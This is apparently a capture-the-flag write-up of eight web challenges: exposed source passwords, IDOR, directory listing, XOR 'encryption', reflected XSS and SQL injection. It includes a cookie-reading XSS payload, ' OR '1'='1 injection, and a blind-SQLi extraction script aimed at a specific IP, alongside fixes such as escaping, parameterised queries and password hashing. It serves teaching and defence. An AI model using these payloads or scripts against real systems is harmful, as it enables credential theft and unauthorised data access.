
Exploiting vulnerabilities in web services
Web Services vulnerabilities
Challenge 1
Simply by inspecting the website's source code we can easily find the requested password.
This may seem like a very silly mistake, but quite often old web pages or careless implementations leave comments or leftover code in which passwords or other sensitive values can be read by any user. That is why it is important to differentiate between what runs client-side, which the user fully controls and can read, and what runs server-side.
Challenge 2
Same concept as challenge 1.
Same problem, but in this case the developer checks the password in JavaScript, in the clear, which means any user can discover the password just by reading the code. Moving the check into a script does not help: both the comparison and the expected value are shipped to the browser.
Challenge 3
In this challenge the URL contains a GET parameter, username, and the page displays the password of whichever user it names; the server trusts this parameter instead of checking who is actually logged in. So we simply change the username parameter to rjy906, our own username, and our password is displayed.
Challenge 4
<link href=/static/level4_passwords/favicon.ico rel=icon>
Browsing to the folder the favicon is served from, /static/level4_passwords/, the directory is listable, so we can also open the file where the passwords are stored. Static assets and sensitive files should never share a web-accessible directory, and directory listing should be disabled.
Challenge 5
In this case, as the hint says, the program uses an encryption based on XOR: what is stored and compared is encrypted_password = password XOR secret_key. Since XOR is its own inverse, applying the same key to the stored value gives the password back, so we can write a short Python script that does just that, using rjy906 as the secret_key.
The value of the encrypted password, base64-encoded, can be found in the code:
import base64

def xor_decrypt(encrypted_bytes, key):
    key_bytes = key.encode()
    decrypted = bytearray()
    for i in range(len(encrypted_bytes)):
        # the key is repeated cyclically over the whole ciphertext
        decrypted_byte = encrypted_bytes[i] ^ key_bytes[i % len(key_bytes)]
        decrypted.append(decrypted_byte)
    return decrypted.decode(errors="replace")  # replace in case of any non-printables

key = "rjy906"
decrypted = xor_decrypt(base64.b64decode("QVlOAQUGRl1MAAYGRVpNCg=="), key)
print("Decrypted password:", decrypted)
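The script above only undoes the XOR. As an added example, not part of the original write-up, the block below shows why this scheme gives no protection at all: the same function encrypts and decrypts, and anyone holding one password together with its stored value recovers the key outright (a known-plaintext attack). The key rjy906 is the one from the challenge; the sample password is constructed.

```python
import base64


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key. Because XOR is its own inverse,
    this single function both 'encrypts' and 'decrypts'."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(plaintext: bytes, ciphertext: bytes, key_len: int) -> bytes:
    """Known-plaintext attack: plaintext XOR ciphertext is the keystream, and with
    a repeating key the first key_len bytes of the keystream are the key itself."""
    if len(plaintext) < key_len or len(ciphertext) < key_len:
        raise ValueError("need at least key_len bytes of plaintext and ciphertext")
    keystream = bytes(p ^ c for p, c in zip(plaintext, ciphertext))
    return keystream[:key_len]


if __name__ == "__main__":
    key = b"rjy906"             # the username, as in the challenge
    password = b"S3cr3t-pass!"  # constructed sample password, not the challenge's
    stored = base64.b64encode(xor_bytes(password, key)).decode()
    print("stored value :", stored)
    print("decrypted    :", xor_bytes(base64.b64decode(stored), key).decode())
    print("recovered key:", recover_key(password, base64.b64decode(stored), len(key)).decode())
```

Note that the "secret" key here is the username, which is public by design; but even a genuinely secret key would not survive a single leaked password/ciphertext pair. Passwords should be stored as salted, slow hashes (bcrypt, scrypt, Argon2), never in a reversible form.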
Challenge 6
The page echoes whatever we send in a "you said" message without escaping it, so we can craft a script that writes document.cookie, where our password is stored, into that element.
<script>document.getElementById('you-said').innerText=document.cookie</script>
Sending this, we get our password back in the response.
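To make the fix concrete, here is an added example (not code from the challenge, whose server side we never see) of the vulnerable echo beside its hardened form. The template string and the element the payload targets are constructed assumptions; the payload is the one used above.

```python
import html

# Constructed server-side template for the "you said" echo (the real page is not shown).
TEMPLATE = '<p id="you-said">You said: {msg}</p>'

PAYLOAD = "<script>document.getElementById('you-said').innerText=document.cookie</script>"


def render_vulnerable(msg: str) -> str:
    """Interpolates the user's message verbatim: markup in msg is parsed and run by the browser."""
    return TEMPLATE.format(msg=msg)


def render_safe(msg: str) -> str:
    """Entity-encodes <, >, &, double and single quotes, so the browser renders msg as text."""
    return TEMPLATE.format(msg=html.escape(msg, quote=True))


def payload_executes(page: str, payload: str) -> bool:
    """Crude reflection check of the kind a scanner does: the probe survived byte-for-byte."""
    return payload in page


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
    print("vulnerable page reflects payload unescaped:", payload_executes(render_vulnerable(PAYLOAD), PAYLOAD))
    print("hardened page reflects payload unescaped:  ", payload_executes(render_safe(PAYLOAD), PAYLOAD))
```

Two caveats a practitioner would add: escaping must match the output context (html.escape is right for element text and quoted attributes, not for data placed inside a script or a URL), and the theft itself only works because the cookie is readable from JavaScript; a cookie set with the HttpOnly flag is not exposed through document.cookie even when the injection succeeds.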
Challenge 7
Looking at the website's cookies we find a show_query cookie.
Setting show_query to true makes the page display the SQL query it executes. Now we can craft our input so that part of it is treated as SQL code and executed as part of the query. Since the query retrieves all the columns of the students table, we just need to make the condition after WHERE always true to get the result.
Our input is going to be: ' OR '1'='1. The first quote closes the string literal the application opened, and the application's own closing quote completes the final '1', so the WHERE condition ends in OR '1'='1', which is true for every row.
Challenge 8
Very similar to challenge 7, but now we do not know the SQL query being executed; we only get true if the query is valid and executes, and false if there is an error. This is a blind, boolean-based SQL injection: each request leaks a single bit, so the password has to be reconstructed one character at a time.
For this case I have written a Python script that, for each character position, iterates over the alphabet trying one letter at a time until we get true, meaning that is the correct letter.
import requests

url = "http://100.26.176.156/level8_password/"
pid = "038139911"
entry_password = "9B5aFswFkmVq8hpA"
charset = "abcdefghijklmnopqrstuvwxyz"
final_password = ""

for i in range(1, 9):  # 8-character password
    print(f"[*] Testing character {i}")
    for c in charset:
        # closes the string literal and appends a condition on one character of the password;
        # the server's own closing quote completes '{c}'
        injection = f"' OR SUBSTRING(password,{i},1)='{c}"
        data = {
            "pid": pid,
            "entry_password": entry_password,
            "password": injection,
        }
        response = requests.post(url, data=data)
        if "<p>success</p>" in response.text:
            print(f"[+] Found character {i}: {c}")
            final_password += c
            break
        else:
            print(f"[-] Tried {c}")

print(f"\nFinal extracted password: {final_password}")
After running this code we get the password and we can use it to complete the last level. Note that the charset only covers lowercase letters: if a position matches none of them the loop simply moves on, so if the result comes back shorter than eight characters, widen the charset to digits and uppercase letters.
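As an added example covering both challenge 7 and challenge 8 (my own code, not the challenge's server or data), the block below rebuilds the situation offline against an in-memory SQLite table: a query that concatenates user input, the ' OR '1'='1 payload dumping every row, the parameterised version that is immune to it, and a blind-injection oracle that, like the level 8 server, only reveals whether a row came back. The extraction routine generalises the letter-by-letter loop above: it first learns the length, then binary-searches each character's code point over printable ASCII, which needs about 7 requests per character and is not limited to a guessed charset. The table contents, the query shape and the pid are constructed assumptions.

```python
import sqlite3

# Constructed sample table; the challenge's real data is not known.
STUDENTS = [
    ("038139911", "xk7wq2pz"),
    ("012345678", "hunter2!"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE students (pid TEXT, password TEXT)")
    conn.executemany("INSERT INTO students VALUES (?, ?)", STUDENTS)
    return conn


def lookup_vulnerable(conn, pid: str, password: str) -> list:
    # Assumed query shape: user input is concatenated into the SQL string (the bug).
    query = ("SELECT pid, password FROM students "
             f"WHERE pid = '{pid}' AND password = '{password}'")
    return conn.execute(query).fetchall()


def lookup_safe(conn, pid: str, password: str) -> list:
    # Same query with bound parameters: the input is only ever data, never SQL.
    query = "SELECT pid, password FROM students WHERE pid = ? AND password = ?"
    return conn.execute(query, (pid, password)).fetchall()


class BlindOracle:
    """Models the level 8 server: it only tells us whether the query returned a row.
    The counter makes the cost of an extraction strategy visible."""

    def __init__(self, conn, pid: str):
        self.conn, self.pid, self.queries = conn, pid, 0

    def __call__(self, condition: str) -> bool:
        self.queries += 1
        # The server's own closing quote completes the trailing '1'='1
        payload = f"' OR (pid='{self.pid}' AND {condition}) AND '1'='1"
        try:
            return len(lookup_vulnerable(self.conn, self.pid, payload)) > 0
        except sqlite3.Error:
            return False


def extract_password(ask: BlindOracle, max_len: int = 64) -> str:
    """Boolean-based blind extraction: learn the length, then binary-search each
    character's code point over printable ASCII (32..126), ~7 queries per character."""
    length = next((n for n in range(1, max_len + 1)
                   if ask(f"length(password)={n}")), None)
    if length is None:
        raise ValueError("password longer than max_len or pid unknown")
    chars = []
    for i in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"unicode(substr(password,{i},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR '1'='1"
    print("vulnerable query  :", lookup_vulnerable(conn, "nobody", payload))  # every row
    print("parameterised     :", lookup_safe(conn, "nobody", payload))        # no row
    ask = BlindOracle(conn, "038139911")
    print("blind extraction  :", extract_password(ask), "in", ask.queries, "queries")
```

Against a real target the oracle's body is replaced by the HTTP request from the script above (the success marker in the response is the bit), and SUBSTRING, substr, length and unicode/ASCII should be adjusted to the database engine in use. The defensive point is the same for both challenges: the parameterised lookup returns nothing for the payload because the quote never reaches the SQL parser.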